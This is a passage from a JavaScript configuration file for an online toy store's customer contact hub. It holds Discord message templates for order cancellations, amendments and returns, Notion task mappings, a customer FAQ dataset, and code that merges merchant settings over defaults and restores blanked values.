       - The PUBLIC KEY (89680f10767fb33eb8dd7f32964d5741460762f34ff4e5c1438e20aff455a6fd).
         Recorded in this comment for the team and used NOWHERE in code. It
         verifies Ed25519 signatures on INBOUND interaction webhooks Discord
         sends to a server; it cannot send anything, so it has no job in a
         browser. It is written down here only so nobody has to go hunting for
         it when the Worker is built.

       THIS PAGE NEVER CALLS DISCORD. It renders a preview of the message that
       WOULD be posted; the backend does the posting. These ids exist so the
       Worker and this file cannot drift apart about which app and which
       channel are meant. */
    applicationId: "1533596762650972290",
    channelId: "1506808810118058276",

    /* `c.placed` is "today (31 July 2026)" or "on (30 July 2026)" — see
       buildDiscordContext(). The client's spec pins the word "today", but
       emitting it unconditionally is wrong for exactly the case this tool
       exists for: mock scenario 2 is a 19-hour-old order that is STILL
       unfulfilled, and the 3PL searches the day's manifest by date.
       The date itself is now computed in the SHOP's timezone (Pacific/Auckland)
       rather than the customer's browser, so a US customer's order no longer
       reports a day earlier than the Shopify admin shows.
       FLAG TO CLIENT: this is the one deviation from the verbatim format. */
    /* SECOND FLAGGED DEVIATION: `c.interception`.
       Discord is what the 3PL actually reads and replies to. The label age, the
       "no carrier movement seen" fact and the words "interception request, not
       a hold" existed only in the Notion log, which the packing team does not
       open — so the one message that decides how urgently they go and look for
       the parcel carried none of the information that makes it urgent. It is
       appended as ONE extra line, only on a TRACKING_ASSIGNED request, and it
       is empty (byte-identical to the client's format) on every OPEN one, which
       is the common case. See buildDiscordContext().

       THIRD FLAGGED DEVIATION, same reason: "Customer requested cancellation
       immediately after placing order" was hard-coded, and it is simply untrue
       of an order placed eleven hours ago — which is exactly the shape the new
       TRACKING_ASSIGNED state accepts. `c.timing` states the real elapsed time,
       and still reads "immediately after placing order" when it was. */
    cancellation: function (c) {
      return "📦 ORDER CANCELLATION REQUEST (Customer Requested)\n\n" +
        "Order: " + c.order + " | Tracking: " + c.tracking + " | Customer: " + c.name +
        " | " + c.qty + "x " + c.product + " ($" + c.total + ")\n\n" +
        "Customer requested cancellation " + c.timing + ".\n\n" +
        "Order was placed " + c.placed + ". Can this be stopped/cancelled before delivery? Please advise." +
        c.interception;
    },

    amendment: function (c) {
      return "📦 ORDER AMENDMENT REQUEST (Customer Requested)\n\n" +
        "Order: " + c.order + " | Tracking: " + c.tracking + " | Customer: " + c.name +
        " | " + c.qty + "x " + c.product + " ($" + c.total + ")\n\n" +
        c.reason + "\n\n" +
        "Order was placed " + c.placed + ". Can this order be amended to ship " +
        c.desired + " instead of " + c.current + "? Please advise." +
        c.interception;
    },

    addressChange: function (c) {
      return "📦 ADDRESS CHANGE REQUEST\n\n" +
        "Order: " + c.order + "\n" +
        "Tracking: " + c.tracking + "\n" +
        "Customer: " + c.name + "\n\n" +
        "Current Address:\n" + c.currentAddress + "\n\n" +
        "New Address:\n" + c.newAddress + "\n\n" +
        "Can this be amended before delivery? Please advise." +
        c.interception;
    },

    /* NEW IN ROUND 5, and the one format the client has not supplied verbatim —
       so it is built out of the three they did. Same 📦 header line, same
       "Order: … | Tracking: … | Customer: …" identity block as the cancellation
       and amendment messages, the address change's stacked
       Current → New shape for the two spellings (because they must be read
       against each other, not scanned along a line), and the same closing
       question, retargeted at the step that matters here: the stitching, not
       the delivery.

       `c.item` is the line item the spelling belongs to, `c.currentSpelling`
       and `c.newSpelling` the two values. The spellings are wrapped in
       quotation marks deliberately: a trailing space, a doubled space or a
       lone apostrophe is invisible otherwise, and those are exactly the
       differences the packing team is being asked to act on.
       FLAG TO CLIENT: confirm this wording with the 3PL before launch. */
    spellingChange: function (c) {
      return "📦 PERSONALISATION SPELLING CHANGE\n\n" +
        "Order: " + c.order + " | Tracking: " + c.tracking + " | Customer: " + c.name + "\n\n" +
        "Item: " + c.item + "\n" +
        "Current spelling: \"" + c.currentSpelling + "\"\n" +
        "New spelling: \"" + c.newSpelling + "\"\n\n" +
        "Order was placed " + c.placed +
        ". Can this be amended before it is customised? Please advise." +
        c.interception;
    },

    /* THE TWO RETURNS MESSAGES. These mirror FORMATS.damageClaim and
       FORMATS.lostParcel in worker/src/discord.js and exist only to render the
       internal preview — the Worker builds the message that is actually
       posted. If the two drift, the preview lies, which is exactly the failure
       the note above categoryByFlow describes. */
    damageClaim: function (c) {
      return "📦 " + c.claimHeading + "\n\n" +
        "Order: " + c.order + " | Tracking: " + c.tracking + " | Customer: " + c.name +
        " | " + c.qty + "x " + c.product + " ($" + c.total + ")\n\n" +
        "Reported: " + c.reasonLabel + " — " + c.severityLabel + "\n" +
        c.deliveredPhrase + "\n\n" +
        "What the customer told us:\n" + c.detail + "\n\n" +
        c.photoLine + "\n\n" +
        c.ask;
    },

    lostParcel: function (c) {
      return "📦 PARCEL NOT RECEIVED\n\n" +
        "Order: " + c.order + " | Tracking: " + c.tracking + " | Customer: " + c.name +
        " | " + c.qty + "x " + c.product + " ($" + c.total + ")\n\n" +
        c.deliveredPhrase + "\n\n" +
        "What the customer told us:\n" + c.detail + "\n\n" +
        "Can you check with the carrier and advise? " +
        "If it cannot be located we will send a replacement.";
    }
  },

  /* ---------------------------------------------------------------------
     NOTION — property names are the REAL ones from the live schema of
     "📦 Customer Service Tasks" (db 9ba49cde-4cc1-47c9-9596-44fb37e897a0).
     --------------------------------------------------------------------- */
  notion: {
    databaseId: "9ba49cde-4cc1-47c9-9596-44fb37e897a0",
    dataSource: "collection://94694943-5ea2-43d3-ad19-b034f70c88e8",
    databaseName: "📦 Customer Service Tasks",

    /* Page-title conventions already in use in the workspace. */
    titleByFlow: {
      "cancel-order":   function (n) { return "Cancellation Request - " + n; },
      "address-change": function (n) { return "Address Change Request - " + n; },
      "amend-order":    function (n) { return "Amendment Request - " + n; },
      "refund-return":  function (n) { return "Refund Request - " + n; },
      /* Round 5. Deliberately NOT "Amendment Request - <name>": these land in
         the same Category as amendments (see below) and on the same Kanban
         column, so if the titles matched too, the one task on the board that
         has a deadline measured in hours of embroidery time would be
         indistinguishable from an ordinary swap. */
      "fix-spelling":   function (n) { return "Personalisation Spelling Change - " + n; }
    },

    /* `Category` select options that actually exist today. NOTE: there is still
       no "Order Amendment" option — amendments land in General Questions.
       Recommend the client adds it and retires the legacy near-duplicates
       (Cancellation / Address Change / Refund / Product Inquiry).

       THIS MAP AND `CATEGORY_BY_FLOW` IN worker/src/notion.js MUST MOVE
       TOGETHER. This one drives the internal preview the customer is shown; the
       Worker's drives the row that is actually created. If they disagree, the
       preview lies. */
    categoryByFlow: {
      "cancel-order":   "Order Cancellation",
      "address-change": "Address Change Request",
      "amend-order":    "General Questions",
      "refund-return":  "Refund Request",
      /* The client has since added a dedicated `Personalisation Amendment`
         option (verified against the live data source), so this now points at
         it instead of sharing General Questions with genuine product
         questions. A spelling change is the one task on the board with a
         deadline measured in hours of embroidery time; it should not sort with
         the general queue. */
      "fix-spelling":   "Personalisation Amendment"
    },

    /* `Progress` select. Anything waiting on the 3PL = Awaiting 3PL Response. */
    progressByFlow: {
      "cancel-order":   "Awaiting 3PL Response",
      "address-change": "Awaiting 3PL Response",
      "amend-order":    "Awaiting 3PL Response",
      "refund-return":  "Not Started",
      "fix-spelling":   "Awaiting 3PL Response"
    }
  },

  /* THE LEGACY COPY BRIDGE — DELIBERATELY EMPTY.

     These eleven strings were the whole of the hub's editable copy before the
     COPY dictionary below existed. Their DEFAULTS have moved into COPY, under
     namespaced keys, so there is exactly one place each default is written and
     COPY-KEYS.md can be generated from it without drifting:

       carrierGeneric       -> shared.carrierGeneric
       poBoxHelp            -> address.poBox.help
       poBoxHint            -> address.poBox.hint
       addressConfirmLabel  -> address.review.confirmLabel
       phoneHint            -> address.form.phoneHint
       phonePlaceholder     -> address.form.phonePlaceholder
       spellingConfirmLabel -> spelling.review.confirmLabel
       spellingRules        -> spelling.form.rules
       spellingStripped     -> spelling.form.stripped
       spellingNonLatin     -> spelling.form.nonLatin
       spellingNeedLetter   -> spelling.form.needLetter

     The eleven SECTION SETTINGS keep their ids (copy_carrier_generic and
     friends), so no merchant loses what they have typed and the section schema
     does not have to be re-saved. The section still emits them into this
     object; lcApplyCopyConfig() maps them onto the keys above. A blank one is
     treated as "not set" and falls back to the built-in default, which is a
     small improvement on the old behaviour, where clearing the field rendered
     an empty label.

     Nothing in this file reads CONFIG.copy directly any more. Every read goes
     through t(). */
  copy: {},

  /* Below this top score the match is a guess rather than an answer, so we
     also show the "talk to a person" card underneath. Raising the ranking
     threshold instead would drop legitimate low-scoring hits like "po box". */
  faqConfidenceScore: 1.2,

  /* FAQ dataset — powers the "Something else?" instant-answer search.
     Weighting: question 3x, aliases 2x, tags 1.2x, answer body 0.4x.
     action.target values map 1:1 to the hub card ids. */
  faq: [
  {
    id: "where-is-my-order",
    question: "Where is my order?",
    aliases: ["wheres my order","where is my parcel","where is my package","hasnt arrived",
              "has not arrived","not arrived yet","still waiting","order status","check my order",
              "whats happening with my order","no sign of it","nothing yet","when will it come",
              "is it on its way"],
    tags: ["order","status","delivery","parcel","package","shipping","waiting","late"],
    answer:
      "<p>You can see exactly where your order is right now — it takes about ten seconds and you don't need an account.</p>" +
      "<p>Have two things handy: your <strong>order number</strong> (it looks like <strong>LC12345</strong> and is at the top of your confirmation email) and the <strong>email address you used when you ordered</strong>.</p>",
    action: { label: "Check my order", target: "order-status" },
    boost: 0.30
  },
  {
    id: "delivery-time",
    question: "How long will my order take to arrive?",
    aliases: ["how long does shipping take","how long is delivery","delivery time","shipping time",
              "when will it arrive","how many days","how long","estimated delivery","eta",
              "dispatch time","how fast is shipping","do you ship fast","when does it ship"],
    tags: ["shipping","delivery","time","days","arrive","dispatch","posted","courier"],
    answer:
      "<p>Two stages, and it helps to think of them separately.</p>" +
      "<p><strong>1. Packing.</strong> We send orders to our packing team in one batch a day, every day except Sunday, so almost everything is packed and handed to the courier within a day of being placed.</p>" +
      "<p><strong>2. The journey.</strong> After that it's with the courier, and your tracking link is the honest answer — it updates as your parcel moves.</p>" +
      "<p>Delivery windows for your country are set out in our shipping policy.</p>",
    action: { label: "See my order's live status", target: "order-status" },
    link: { label: "Read the full shipping policy", href: "%%shippingPolicy%%" },
    boost: 0.35
  },
  {
    id: "track-order",
    question: "How do I track my order?",
    aliases: ["tracking","tracking number","tracking link","track my parcel","track my package",
              "where do i track","tracking code","yt number","how do i follow my order","trace my order"],
    tags: ["track","tracking","number","link","courier","parcel"],
    answer:
      "<p>Look your order up here and we'll show you where it has got to, plus a button straight through to our tracking page — no copying numbers into other websites.</p>" +
      "<p>Your tracking number starts with <strong>YT</strong> followed by 16 digits, like <strong>YT2620800708901516</strong>. It's also in the email we sent when your parcel was packed.</p>" +
      "<p>One thing worth knowing: a brand-new tracking number can take a day or two to start showing scans. That's normal.</p>",
    action: { label: "Track my order", target: "order-status" },
    boost: 0.20
  },
  {
    id: "tracking-not-updating",
    question: "My tracking hasn't updated in days",
    aliases: ["tracking not moving","tracking stuck","tracking hasnt changed","no scans",
              "tracking not updating","no movement","tracking frozen","same status for days",
              "is my parcel lost","order lost"],
    tags: ["tracking","stuck","stalled","lost","delayed","no","update","movement"],
    answer:
      "<p>This is the single most common worry we hear, and it's almost always fine.</p>" +
      "<p>Tracking goes quiet at two points: just after your parcel is packed, and again partway through the journey while it's between handovers. Several days of silence there is normal — the parcel is moving even when the scans aren't.</p>" +
      "<p>Check your order first. If the most recent scan is more than 10 days old, come back and start a claim and we'll chase it for you.</p>",
    action: { label: "Check my latest tracking", target: "order-status" },
    boost: 0.10
  },
  {
    id: "change-address",
    question: "Can I change my delivery address?",
    aliases: ["change address","wrong address","update my address","change my adress","i moved",
              "moved house","sent to old address","wrong house number","fix my address",
              "change delivery details","change shipping address","typo in address","address change"],
    tags: ["address","change","update","delivery","shipping","wrong","moved","street"],
    answer:
      /* NOT "as long as your order hasn't been packed yet". A TRACKING_ASSIGNED
         order IS packed and labelled and the hub now accepts it — so the promise
         the customer reads first was stricter than the behaviour, and this is
         the line they would quote when the FAQ and the form disagreed. */
      "<p>Yes — as long as it hasn't left us yet, and you can do it yourself right here. Look your order up and we'll tell you straight away.</p>" +
      "<p>Two things to know. We pack orders once a day, every day except Sunday, so the sooner you do this the better. And we can't deliver to a <strong>PO Box</strong> — parcels sent to one get returned to us, so please give us a street address.</p>" +
      "<p>You'll see your current address, type the new one, then check it side by side before anything is sent.</p>",
    action: { label: "Change my address", target: "address-change" },
    boost: 0.25
  },
  {
    id: "cancel-order",
    question: "Can I cancel my order?",
    aliases: ["cancel","cancel my order","cancellation","cancelation","i want to cancel",
              "stop my order","changed my mind","dont want it","cancel and refund","call it off",
              "undo my order","made a mistake"],
    tags: ["cancel","stop","refund","mind","mistake","order"],
    answer:
      /* "hasn't left us", not "hasn't been packed", for the reason set out on
         the address answer above: a packed-and-labelled order that has not
         moved is still actionable here, and the form will offer to ask about
         it. The FAQ must not refuse what the next screen accepts. */
      "<p>Yes, if it hasn't left us yet. Look your order up and we'll tell you straight away whether it can still be stopped — no guessing, we check the real status.</p>" +
      "<p>If it has already left us, don't worry. Once it arrives you have <strong>14 days</strong> to ask to send it back, which you do through your Little Cubs account.</p>",
    action: { label: "Cancel my order", target: "cancel-order" },
    boost: 0.25
  },
  {
    id: "ordered-wrong-thing",
    question: "I ordered the wrong thing — can I swap it?",
    aliases: ["ordered wrong item","wrong colour","wrong color","wrong size","wrong variant",
              "picked the wrong one","chose the wrong one","ordered twice","duplicate order",
              "ordered two by mistake","wrong quantity","change my order","swap my order",
              "amend my order","i clicked the wrong one"],
    tags: ["wrong","swap","change","amend","colour","color","size","variant","duplicate","twice","mistake"],
    answer:
      /* Same wording rule as the cancel and address answers above. */
      "<p>Easy mistake, and usually an easy fix. If your order hasn't left us yet we can often swap it for the right one.</p>" +
      "<p>Tell us what you'd like instead and we'll ask our packing team before it goes out. If there's a price difference we'll sort that out too.</p>",
    action: { label: "Change what I ordered", target: "amend-order" },
    boost: 0.10
  },
  {
    /* ROUND 5. Round 5 added a seventh hub door and a whole flow and left this
       dataset untouched, so the one search box the hub's own "Ask a question"
       card sends people to had no route to it at all — and answered
       confidently and wrongly. "misspelled" returned ONE answer, "I've only
       received part of my order"; "wrong name" and "name spelt wrong" both
       topped out at this entry's neighbour above, whose action button opens
       the amend flow — and swapBuildIndex() deliberately excludes every
       product in CONFIG.catalogue.excludeCollection, so a customer sent there
       cannot even SEE the personalised item they are trying to fix. Scoring
       above CONFIG.faqConfidenceScore, it also suppressed the "talk to a
       person" card, so there was no way out either.

       `requires:"personalisation"` gates it exactly like the hub card: switch
       CONFIG.personalisation.enabled off and the answer leaves the index with
       the card, rather than advertising a door that opens onto "there is
       nothing personalised on this order". */
    id: "fix-spelling",
    requires: "personalisation",
    question: "The name on my personalised item is spelt wrong",
    aliases: ["spelling","misspelled","mispelt","misspelt","spelt wrong","spelled wrong",
              "wrong name","name is wrong","name spelt wrong","typo in name","typo",
              "personalised","personalized","embroidery","embroidered","stitched name",
              "name on the backpack","name on the bag","change the name","fix the name",
              "wrong spelling","letter wrong"],
    tags: ["spelling","name","personalised","personalized","embroidery","embroidered",
           "stitched","typo","misspelled","backpack","monogram"],
    answer:
      "<p>If we haven't stitched it yet, we can usually still change it — and this is the fastest way to ask.</p>" +
      "<p>Look your order up, pick the personalised item, and type the spelling exactly as it should be. We'll show you the old and the new side by side before anything is sent.</p>" +
      "<p>One honest caveat: we can't see from here whether the stitching has already started, so our packing team has to confirm it. We'll email you either way.</p>",
    action: { label: "Fix my spelling", target: "fix-spelling" },
    boost: 0.25
  },
  {
    id: "partial-delivery",
    question: "I've only received part of my order",
    aliases: ["part of my order","only got one item","item missing","missing item","half my order",
              "one thing missing","not everything arrived","incomplete order","partial delivery",
              "where is the rest","only some of it came","second parcel"],
    tags: ["partial","missing","incomplete","part","rest","separate","parcel","item"],
    answer:
      "<p>Good news: this usually isn't a mistake.</p>" +
      "<p>When an order has more than one item, the items are often packed into separate parcels and can arrive a few days apart. Nothing has been forgotten — the rest is still on its way.</p>" +
      "<p>Look your order up. If you see more than one tracking number, that's your other parcel and you can follow it there.</p>",
    action: { label: "See all my parcels", target: "order-status" }
  },
  {
    id: "damaged-item",
    question: "My item arrived damaged",
    aliases: ["damaged","broken","arrived broken","it has a hole","torn","ripped","cracked",
              "faulty","split","leaking","damaged in transit","came damaged","its broken","doesnt work"],
    tags: ["damaged","broken","faulty","torn","hole","cracked","replace","claim"],
    answer:
      "<p>We're sorry — let's get that put right.</p>" +
      "<p>Before you do anything, please take a few photos: the damage itself, and the packaging it arrived in. Please keep the packaging for now, we sometimes need it.</p>" +
      /* There is no upload control anywhere in this app and the destination is
         an email address, so the copy must not promise one. */
      "<p>Tell us here and we'll show you exactly where to send them — one photo of the item, one of the packaging — and we'll arrange a replacement or a refund.</p>" +
      /* THIS ANSWER IS READ WITH NO ORDER LOADED, so it cannot know whether
         this customer has cover and must not pretend to. It says "if you
         added" and sends them to look the order up, where hasSeel() knows the
         answer and the flow routes properly. Do not turn this into a claim
         about their order. */
      "<p>One thing to check first: if you added <strong>Worry-Free Purchase</strong> to your order, damage is claimed through Seel rather than through us, and their deadline is short — 7 days from the delivery date. Look your order up and we'll take you straight to the right place.</p>",
    action: { label: "See how to report this", target: "refund-return" },
    boost: 0.10
  },
  {
    id: "wrong-item",
    question: "I was sent the wrong item",
    aliases: ["wrong item sent","wrong product","not what i ordered","received the wrong thing",
              "sent the wrong colour","sent wrong color","different to what i ordered",
              "someone elses order","wrong order arrived"],
    tags: ["wrong","incorrect","mixup","different","not","ordered","received","sent"],
    answer:
      "<p>That's on us, and we'll fix it.</p>" +
      "<p>Please take a photo of what actually arrived, plus a photo of the label on the outside of the bag — that tells us exactly where the mix-up happened.</p>" +
      "<p>Tell us what arrived and we'll get the right one to you.</p>",
    action: { label: "See how to report this", target: "refund-return" }
  },
  {
    id: "returns-refunds",
    question: "How do I return something or get a refund?",
    aliases: ["return","returns","refund","money back","send it back","how do i return",
              "refund process","return policy","i want my money back","not happy with it",
              "doesnt fit","want to send it back","exchange"],
    tags: ["return","refund","money","back","policy","exchange","send"],
    answer:
      "<p>If it isn't right, you can send it back. You have <strong>14 days from the day your order arrives</strong> to ask for a return.</p>" +
      "<p>You start it yourself in your Little Cubs account — you'll need an account set up with the email address you ordered with, and you can create one in a minute if you haven't already. Pick the order, pick the items, and tell us why.</p>" +
      "<p>Please don't post anything back before you've done this. Without a return approved against your order we may not be able to match your parcel to it.</p>",
    action: { label: "See how returns work", target: "refund-return" },
    link: { label: "Read the full refund policy", href: "%%refundPolicy%%" },
    boost: 0.15
  },
  {
    id: "no-confirmation-email",
    question: "I placed an order but haven't received a confirmation email",
    aliases: ["no confirmation","no confirmation email","didnt get an email","no email","no receipt",
              "havent received confirmation","did my order go through","not sure if it worked",
              "no order number","i dont have my order number","lost my order number"],
    tags: ["confirmation","email","receipt","spam","junk","number","missing"],
    answer:
      "<p>Nine times out of ten it's sitting in your spam or promotions folder. Search your inbox for <strong>Little Cubs</strong> — that finds it faster than scrolling.</p>" +
      "<p>If it isn't there, there may be a small typo in the email address you typed at checkout. Your order will still exist, and you can find it here using the email you think you used.</p>" +
      "<p>Still nothing? Email us from the address you'd like us to use, at <a href=\"mailto:%%supportEmail%%\">%%supportEmail%%</a>, and we'll find your order for you.</p>",
    action: { label: "Find my order", target: "order-status" }
  },
  {
    id: "worry-free-purchase",
    question: "What is the 'Worry-Free Purchase' charge on my order?",
    aliases: ["worry free purchase","worry-free","extra charge","what is this charge",
              "small extra item","seel","purchase protection","whats the extra dollar",
              "i didnt order this","extra line on my order"],
    tags: ["worry","free","purchase","protection","charge","extra","seel","insurance"],
    answer:
      "<p>That small extra line on your order is optional <strong>purchase protection</strong>, added at checkout. It isn't a toy and nothing extra is being posted to you.</p>" +
      "<p>It's there to cover the parcel itself — delayed, lost, stolen, or damaged on the way to you. The cover is provided by <strong>Seel</strong>, not by us: they open the claim, they decide it and they pay it, so going straight to them is the quickest way to get it sorted. Seel decide what is covered and for how long.</p>" +
      "<p>If it arrived damaged, or the tracking says delivered and nothing turned up, <strong>tell Seel within 7 days of the delivery date</strong>. That window is short, so please do not wait to see whether it sorts itself out.</p>" +
      "<p>If something has gone wrong with your parcel, start here and we'll point you to the right place.</p>",
    action: { label: "Report a problem with my parcel", target: "refund-return" },
    link: { label: "Open Seel's Resolution Center", href: "%%seelResolve%%" }
  },
  {
    id: "fold-pool-tent",
    question: "How do I fold down the Little Cubs Pop-Up Pool Tent?",
    aliases: ["fold down pool tent","fold the tent","foldable","fold down","folddown","pooltent",
              "pack up","pack it away","pack down","put it away","wont fold",
              "it wont go back in the bag","back in the bag","collapse the tent","close the tent",
              "twist it","how do i fold it","cant fold it","flatten it"],
    tags: ["fold","pack","pool","tent","away","bag","collapse","close","video","popup","flatten"],
    answer:
      "<p>There's a knack to it, and once you've seen it done it takes about ten seconds every time.</p>" +
      "<p>The main thing: it's a gentle <strong>twist</strong>, not a push. If you try to flatten it by pressing down it will spring straight back at you. The video below shows exactly where to put your hands.</p>",
    /* Was the Vimeo embed (635691480). Now the client's own file on the
       Shopify CDN. The `file` provider takes { provider, src, poster } — see
       lcRenderFaqVideo(); the vimeo shape still works for any other entry.
       `poster` is omitted deliberately so this entry inherits
       CONFIG.faqVideoPoster; set it here to override for this answer only. */
    video: { provider: "file", src: "%%poolTentVideoFile%%" },
    /* The size is IN THE LABEL. This link is the one thing on the answer that
       is not lazy — it sits directly under "Nothing downloads until you press
       play" — and on mobile data even a 7 MB transfer is a real cost to a real
       customer, so it is named before it starts. 7 MB, not the 43 MB this said
       before the client re-encoded the file: an over-stated size scares people
       off a video that is now perfectly reasonable to open on a phone.
       lcRenderAnswer() adds target="_blank" + rel="noopener" for media hrefs so
       the hub survives the trip. */
    link: { label: "Open the video in a new tab (7 MB)", href: "%%poolTentVideoFile%%" },
    boost: 0.15
  },
  {
    id: "pool-tent-surface",
    question: "Can I use the Pool Tent on grass or a flat surface?",
    aliases: ["pool tent on grass","on grass","on concrete","on decking","on sand","on the lawn",
              "what surface","indoors","inside","on carpet","where can i put it",
              "does it need a flat surface"],
    tags: ["grass","lawn","surface","flat","concrete","decking","sand","carpet","indoors","pool","tent","ground"],
    answer:
      "<p>Yes. Grass, decking, sand or indoors on carpet all work — the flatter the spot, the better it sits.</p>" +
      "<p>Just have a quick look over the ground first and clear away any sticks, stones or anything sharp before you set it down.</p>" +
      "<p>Pick your flattest spot, clear it, then pop the tent up.</p>",
    link: { label: "Browse the full range", href: "%%allProducts%%" }
  },
  {
    id: "age-suitability",
    question: "What age are your products suitable for?",
    aliases: ["what age","age range","suitable age","how old","is it for toddlers","is it for babies",
              "age recommendation","will my grandchild like it","what age is this for","right age",
              "for a 2 year old","for a 3 year old"],
    tags: ["age","old","years","toddler","baby","child","suitable","gift"],
    answer:
      "<p>Our range is made for babies, toddlers and pre-schoolers.</p>" +
      "<p>The exact age each toy is designed for is written on its own product page, so that's the place to check before you buy — especially if it's a gift.</p>",
    link: { label: "Browse the full range", href: "%%allProducts%%" }
  },
  {
    id: "child-safe",
    question: "Are your products child friendly?",
    aliases: ["child friendly","child safe","is it safe","safety","safe for babies","safe for toddlers",
              "non toxic","materials","bpa","any small parts"],
    tags: ["safe","safety","child","friendly","toxic","materials","supervise"],
    answer:
      "<p>Yes — every product we sell is designed for small children.</p>" +
      "<p>As with any toy, please stay nearby while your little one plays. That goes double for the Pop-Up Pool Tent whenever there's water in it.</p>" +
      "<p>If you have a specific safety question about one product, the details are on its product page.</p>",
    link: { label: "Browse the full range", href: "%%allProducts%%" }
  },
  {
    id: "contact-us",
    question: "I still need help from a person",
    aliases: ["talk to a human","contact you","email you","phone number","speak to someone",
              "customer service","help me","none of these help"],
    tags: ["contact","human","person","email","help","support"],
    answer:
      "<p>No problem — we're a small team and a real person reads every message.</p>" +
      "<p>Email <a href=\"mailto:%%supportEmail%%\">%%supportEmail%%</a> and put your <strong>order number</strong> in the subject line. That one detail is what lets us answer properly the first time instead of writing back to ask for it.</p>",
    lastResort: true
  }
  ]
};

/* ===========================================================================
   THE ONE BOUNDARY: section settings -> this file.

   sections/contact-hub.liquid emits a single
   `<script type="application/json" id="lc-hub-config">` containing everything
   the merchant can tune, in the same shape as the CONFIG object above. It is
   deep-merged OVER those defaults, which means:

     * a setting the merchant never touched simply is not in the blob, and the
       default above stands — so adding a setting to the schema later cannot
       break a store that has not re-saved its section;
     * ARRAYS REPLACE, they do not merge. `hubCards` and `faq` come from theme
       blocks, and a merchant who reorders or deletes cards must get exactly the
       list they built, not their list plus the leftovers of the default one;
     * `null` is treated as "not set" and never clobbers a default. That covers
       a setting nobody has ever saved, which Liquid emits as null. It does NOT
       cover a setting the merchant CLEARED: that arrives as "" and does
       overwrite. Values with no meaningful empty state are listed in
       LC_REQUIRED_STRINGS below and restored after the merge; the two that ARE
       legitimately blankable (the FAQ video poster, the swap-exclusion
       collection) are deliberately absent from it;
     * a default that is a FUNCTION is never replaceable. The Discord message
       builders and the Notion title builders are code, not settings; JSON
       cannot express them and must not be able to null them out.

   If the blob is missing or unparseable the hub still boots on its defaults and
   logs to the console, because a mis-typed setting must degrade to "the stock
   copy" and never to a blank page.
   =========================================================================== */
function lcIsPlainObject(v) {
  return !!v && typeof v === "object" && Object.prototype.toString.call(v) !== "[object Array]";
}

function lcDeepMerge(target, patch) {
  if (!lcIsPlainObject(patch) || !lcIsPlainObject(target)) return target;
  Object.keys(patch).forEach(function (k) {
    var pv = patch[k];
    if (pv === null || pv === undefined) return;          // "not set"
    if (typeof target[k] === "function") return;          // never overwrite code
    if (lcIsPlainObject(pv) && lcIsPlainObject(target[k])) { lcDeepMerge(target[k], pv); return; }
    target[k] = pv;
  });
  return target;
}

function lcApplyBlobConfig(cfg) {
  var el = document.getElementById("lc-hub-config");
  if (!el) {
    if (window.console && console.warn) {
      console.warn("[contact-hub] no #lc-hub-config element — running on built-in defaults.");
    }
    return cfg;
  }
  var parsed = null;
  try {
    parsed = JSON.parse(el.textContent || el.innerHTML || "{}");
  } catch (e) {
    if (window.console && console.error) {
      console.error("[contact-hub] #lc-hub-config is not valid JSON; using defaults.", e);
    }
    return cfg;
  }
  return lcDeepMerge(cfg, parsed);
}

/* ===========================================================================
   AN EMPTY STRING IS "NOT SET" FOR EVERY VALUE THAT HAS NO EMPTY STATE.
   ---------------------------------------------------------------------------
   READ THIS BEFORE ADDING A TEXT SETTING TO THE BLOB.

   Liquid's `| json` emits `null` for a setting that has never been saved, and
   the merge above reads null as "not set" — but a setting the merchant CLEARS
   in the theme editor is `""`, NOT nil, and `"" | json` is `""`. lcDeepMerge
   writes that straight over the default. So "the section emits blanks as null"
   is only true of settings nobody has touched; one keystroke in the theme
   editor turns any of these into an empty string.

   That already happened once in production, to the two API endpoints: a
   cleared "Request submission endpoint" overwrote the default with "",
   fetch("") POSTed to the current page URL, Shopify answered with the page
   HTML or a 405, and EVERY submit on EVERY flow reported a connection problem
   for ever with nothing naming the real cause. It failed in the safe direction
   — the customer was told the packing team had not been told — but silently
   and unboundedly.

   The endpoints were fixed. The other two dozen were not, and they fail the
   same way, just less loudly: a cleared support email renders
   `Please email <a href="mailto:"></a> with your order number` on every error
   screen, a cleared returns URL turns "Start a return" into a link back to the
   contact page, a cleared tracking URL does the same to the track button.

   SO THE RULE IS DECLARED, ONCE, HERE. Every dotted path below is a value with
   no meaningful empty state. The default is snapshotted BEFORE the merge and
   restored after it if what arrived is blank, with one warning per key naming
   the setting so the cause is findable. The section's Liquid `default:` filters
   on lookupUrl/submitUrl stay as the belt to this pair of braces; this also
   covers a hand-edited blob, which no Liquid filter can.

   WHAT IS DELIBERATELY *NOT* IN THIS LIST — the settings where blank is a REAL,
   supported value, and clearing them must clear them:
     faqVideoPoster              no poster -> the styled placeholder panel;
     catalogue.excludeCollection blank -> inherit personalisation.collection.
   Adding either here would break a documented feature. Anything else that is
   emitted from a `text` setting belongs in the list.
   =========================================================================== */
var LC_REQUIRED_STRINGS = [
  "store.name", "store.domain", "store.supportEmail", "store.orderPrefix",
  "urls.shippingPolicy", "urls.refundPolicy", "urls.faqPage",
  "urls.poolTentVideo", "urls.poolTentVideoFile", "urls.allProducts",
  "urls.trackingApp", "urls.returnsHub", "urls.seelResolve", "urls.cartPermalinkBase",
  "fulfillment.carrier", "fulfillment.threePL",
  "fulfillment.dispatchCutoffLocal", "fulfillment.dispatchTimezone",
  "api.lookupUrl", "api.submitUrl", "api.evidenceUrl",
  "seel.sku", "seel.vendor", "seel.title",
  "discord.channel", "discord.applicationId", "discord.channelId",
  "notion.databaseId", "notion.dataSource", "notion.databaseName"
];

function lcConfigGet(path) {
  var parts = path.split(".");
  var node = CONFIG;
  for (var i = 0; i < parts.length; i++) {
    if (!node || typeof node !== "object") return undefined;
    node = node[parts[i]];
  }
  return node;
}

function lcConfigSet(path, value) {
  var parts = path.split(".");
  var node = CONFIG;
  for (var i = 0; i < parts.length - 1; i++) {
    if (!node || typeof node !== "object") return;
    node = node[parts[i]];
  }
  if (node && typeof node === "object") node[parts[parts.length - 1]] = value;
}

/* Snapshotted BEFORE the merge — after it the default is already gone. */
var LC_STRING_FALLBACKS = {};
LC_REQUIRED_STRINGS.forEach(function (p) { LC_STRING_FALLBACKS[p] = lcConfigGet(p); });

lcApplyBlobConfig(CONFIG);

function lcRestoreBlankedStrings() {
  LC_REQUIRED_STRINGS.forEach(function (p) {
    var fallback = LC_STRING_FALLBACKS[p];
    if (typeof fallback !== "string") return;      // nothing to restore to
    var v = lcConfigGet(p);
    if (typeof v === "string" && !v.trim()) {
      lcConfigSet(p, fallback);
      if (window.console && console.warn) {
        console.warn("[contact-hub] CONFIG." + p + " was blank; using the built-in " +
                     "default (\"" + fallback + "\"). Clear-to-reset is not supported on " +
